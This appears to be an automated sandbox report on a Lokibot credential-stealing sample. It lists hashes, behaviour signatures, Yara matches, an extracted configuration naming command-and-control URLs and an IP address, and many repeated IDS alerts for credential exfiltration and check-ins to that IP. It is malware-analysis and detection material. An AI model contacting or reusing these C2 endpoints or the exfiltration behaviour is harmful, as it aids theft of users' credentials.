Analysis Report SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120 (renamed file extension from 22120 to exe)
Analysis ID: 368924
MD5: 968e090b17ce57156a66188b4db032ba
SHA1: de2b8b3bf2024cf8a3bdd7ede0ce86bb5a7b13de
SHA256: 62562b38c8055ca3d5143c759d1fe6e946e0b3a85bf4397b056589d3c271392c

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe (PID: 2576 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe' MD5: 968E090B17CE57156A66188B4DB032BA)
    • cmd.exe (PID: 4176 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3896 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://87.251.79.157/m0ha/0/pin.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | (strings below)
  • 0x142bf:$des3: 68 03 66 00 00
  • 0x186b0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x1877c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth | (strings below)
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack | Loki_1 | Loki Payload | kevoreilly | (strings below)
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://87.251.79.157/m0ha/0/pin.php"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | Virustotal: Detection: 42%
Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | ReversingLabs: Detection: 17%
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 172.67.197.219:443 -> 192.168.2.5:49692 version: TLS 1.0
Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49696 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49696 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49696 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49696 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49697 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49697 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49697 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49697 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49698 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49698 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49698 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49698 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49698
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49699 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49699 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49699 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49699 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49699
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49700 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49700 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49700 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49700 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49700
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49701 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49701 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49701 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49701 -> 87.251.79.157:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49701
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49702
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49703
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49704
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49706
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49707
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49708
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49709
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49710
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49711
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49712
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49713
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49714
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49715
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49716
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49717
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49718
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49719
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49720
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49721
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49722
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49723
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49724
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49725
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49726
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49727
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49728
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49729
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49730
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 87.251.79.157:80
